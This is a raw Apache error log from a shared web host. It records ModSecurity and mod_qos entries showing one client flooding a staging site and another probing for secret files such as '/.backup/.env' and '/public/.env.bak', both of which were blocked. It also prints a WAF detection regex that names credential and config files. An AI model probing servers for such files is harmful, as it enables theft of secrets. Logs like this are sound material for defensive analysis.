[Tue May 26 19:53:49.292470 2026] [security2:error] [pid 86490:tid 86736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs81ZMwN0DpLVWo6Kt9AAAAPk"]
[Tue May 26 19:53:49.300639 2026] [security2:error] [pid 86490:tid 86698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs81ZMwN0DpLVWo6Kt5wAAANM"]
[Tue May 26 19:53:49.310697 2026] [security2:error] [pid 93867:tid 94209] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs85CDfrjqoHpuuBKrPQAAAXY"]
[Tue May 26 19:53:49.317180 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs82DRMqfxdEDkoszLLQAAAGI"]
[Tue May 26 19:53:49.331702 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs82DRMqfxdEDkoszLOAAAAC0"]
[Tue May 26 19:53:49.333050 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLSwAAAGg"]
[Tue May 26 19:53:49.340871 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs82DRMqfxdEDkoszLOgAAAB0"]
[Tue May 26 19:53:49.352853 2026] [security2:error] [pid 86490:tid 86673] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs81ZMwN0DpLVWo6KuAQAAALo"]
[Tue May 26 19:53:49.362150 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLTgAAAAQ"]
[Tue May 26 19:53:49.366576 2026] [security2:error] [pid 86490:tid 86693] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs81ZMwN0DpLVWo6Kt_gAAAM4"]
[Tue May 26 19:53:49.376438 2026] [security2:error] [pid 93576:tid 93787] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs82DRMqfxdEDkoszLNAAAAEs"]
[Tue May 26 19:53:49.381947 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLSQAAAEA"]
[Tue May 26 19:53:49.397314 2026] [security2:error] [pid 93867:tid 94135] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9JCDfrjqoHpuuBKrQgAAAVY"]
[Tue May 26 19:53:49.397869 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLUQAAAH4"]
[Tue May 26 19:53:49.398874 2026] [security2:error] [pid 93867:tid 94039] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9JCDfrjqoHpuuBKrQwAAASM"]
[Tue May 26 19:53:49.409781 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLUAAAAHE"]
[Tue May 26 19:53:49.413817 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLWAAAAGk"]
[Tue May 26 19:53:49.429010 2026] [security2:error] [pid 93867:tid 94081] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs9JCDfrjqoHpuuBKrXwAAATw"]
[Tue May 26 19:53:49.433592 2026] [security2:error] [pid 93867:tid 94211] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9JCDfrjqoHpuuBKrTwAAAXc"]
[Tue May 26 19:53:49.435760 2026] [security2:error] [pid 93576:tid 93731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLVQAAABM"]
[Tue May 26 19:53:49.440639 2026] [security2:error] [pid 93576:tid 93733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLWQAAABU"]
[Tue May 26 19:53:49.451133 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLXAAAAFo"]
[Tue May 26 19:53:49.452975 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLVAAAABw"]
[Tue May 26 19:53:49.463891 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLagAAAHY"]
[Tue May 26 19:53:49.481574 2026] [security2:error] [pid 93867:tid 94226] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9JCDfrjqoHpuuBKrRwAAAX8"]
[Tue May 26 19:53:49.481743 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLaAAAABk"]
[Tue May 26 19:53:49.630118 2026] [qos:error] [pid 86490:tid 86736] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuoAAAAPk
[Tue May 26 19:53:49.633108 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuoQAAAMU
[Tue May 26 19:53:49.634780 2026] [qos:error] [pid 86490:tid 86675] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuogAAALw
[Tue May 26 19:53:49.636851 2026] [qos:error] [pid 86490:tid 86698] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuowAAANM
[Tue May 26 19:53:49.641399 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KupAAAAL4
[Tue May 26 19:53:49.654350 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KupQAAAPU
[Tue May 26 19:53:49.673491 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KupgAAAK8
[Tue May 26 19:53:49.682235 2026] [qos:error] [pid 86490:tid 86673] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuqAAAALo
[Tue May 26 19:53:49.702403 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KurwAAANk
[Tue May 26 19:53:49.702573 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9WDRMqfxdEDkoszLoAAAAB8
[Tue May 26 19:53:49.791588 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KusgAAAPg
[Tue May 26 19:53:49.791852 2026] [qos:error] [pid 86490:tid 86631] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuswAAAJA
[Tue May 26 19:53:49.793383 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KutAAAAMo
[Tue May 26 19:53:49.794322 2026] [qos:error] [pid 86490:tid 86625] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KutQAAAIo
[Tue May 26 19:53:49.797657 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KutgAAAJg
[Tue May 26 19:53:49.801616 2026] [qos:error] [pid 86490:tid 86706] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KutwAAANs
[Tue May 26 19:53:49.830746 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuuAAAAI0
[Tue May 26 19:53:49.836349 2026] [qos:error] [pid 86490:tid 86640] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuuQAAAJk
[Tue May 26 19:53:49.921952 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9WDRMqfxdEDkoszLoQAAAGc
[Tue May 26 19:53:49.923421 2026] [qos:error] [pid 86490:tid 86687] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuugAAAMg
[Tue May 26 19:53:49.940882 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuuwAAAOw
[Tue May 26 19:53:49.943020 2026] [qos:error] [pid 86490:tid 86725] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuvgAAAO4
[Tue May 26 19:53:49.943022 2026] [qos:error] [pid 86490:tid 86682] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuvAAAAMM
[Tue May 26 19:53:49.943359 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuvQAAAQM
[Tue May 26 19:53:49.949776 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuvwAAAIw
[Tue May 26 19:53:49.951341 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuwAAAAOg
[Tue May 26 19:53:49.961220 2026] [security2:error] [pid 86490:tid 86668] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.backup/.env"] [unique_id "ahWs9VZMwN0DpLVWo6KuwQAAALU"]
[Tue May 26 19:53:49.985381 2026] [qos:error] [pid 86490:tid 86679] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuwwAAAMA
[Tue May 26 19:53:49.990676 2026] [qos:error] [pid 86490:tid 86623] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KuxQAAAIg
[Tue May 26 19:53:50.069669 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9mDRMqfxdEDkoszLogAAAD8
[Tue May 26 19:53:50.073959 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KuyQAAALg
[Tue May 26 19:53:50.088470 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KuygAAANg
[Tue May 26 19:53:50.092410 2026] [qos:error] [pid 86490:tid 86653] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KuywAAAKY
[Tue May 26 19:53:50.092851 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KuzAAAAMI
[Tue May 26 19:53:50.093587 2026] [qos:error] [pid 86490:tid 86728] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KuzQAAAPE
[Tue May 26 19:53:50.098028 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KuzgAAAP8
[Tue May 26 19:53:50.105116 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6KuzwAAALQ
[Tue May 26 19:53:50.139305 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6Ku0QAAAKw
[Tue May 26 19:53:50.143908 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6Ku0gAAAMU
[Tue May 26 19:53:50.217480 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9mDRMqfxdEDkoszLowAAADQ
[Tue May 26 19:53:50.220360 2026] [core:crit] [pid 86490:tid 86662] (13)Permission denied: [client 157.55.39.195:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:53:50.231471 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6Ku1gAAANk
[Tue May 26 19:53:50.237202 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6Ku1wAAAJE
[Tue May 26 19:53:50.242954 2026] [qos:error] [pid 86490:tid 86630] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6Ku2AAAAI8
[Tue May 26 19:53:50.249468 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6Ku2QAAAPg
[Tue May 26 19:53:50.258957 2026] [qos:error] [pid 86490:tid 86631] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6Ku2gAAAJA
[Tue May 26 19:53:50.259009 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6Ku2wAAAMQ
[Tue May 26 19:53:50.264138 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9lZMwN0DpLVWo6Ku3AAAAMo
[Tue May 26 19:53:50.275243 2026] [security2:error] [pid 93576:tid 93799] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLWgAAAFc"]
[Tue May 26 19:53:50.275908 2026] [security2:error] [pid 93576:tid 93732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLYwAAABQ"]
[Tue May 26 19:53:50.276075 2026] [security2:error] [pid 93576:tid 93777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLaQAAAEE"]
[Tue May 26 19:53:50.276745 2026] [security2:error] [pid 93867:tid 94032] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9JCDfrjqoHpuuBKrTQAAARw"]
[Tue May 26 19:53:50.281425 2026] [security2:error] [pid 93867:tid 94044] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9JCDfrjqoHpuuBKrTgAAASg"]
[Tue May 26 19:53:50.294834 2026] [security2:error] [pid 93867:tid 94041] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9JCDfrjqoHpuuBKrTAAAASU"]
[Tue May 26 19:53:50.297490 2026] [security2:error] [pid 93867:tid 94216] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9JCDfrjqoHpuuBKrVAAAAXo"]
[Tue May 26 19:53:50.298809 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLcQAAACo"]
[Tue May 26 19:53:50.301043 2026] [security2:error] [pid 86490:tid 86705] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/public/.env.bak"] [unique_id "ahWs9lZMwN0DpLVWo6Ku3wAAANo"]
[Tue May 26 19:53:50.301513 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLUgAAAHI"]
[Tue May 26 19:53:50.304383 2026] [security2:error] [pid 93867:tid 94229] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9JCDfrjqoHpuuBKrUgAAAYA"]
[Tue May 26 19:53:50.305350 2026] [security2:error] [pid 93867:tid 94095] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9JCDfrjqoHpuuBKrWQAAAUM"]
[Tue May 26 19:53:50.315788 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9GDRMqfxdEDkoszLawAAAC4"]
[Tue May 26 19:53:50.320937 2026] [security2:error] [pid 93867:tid 94231] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs9JCDfrjqoHpuuBKrWgAAAYE"]
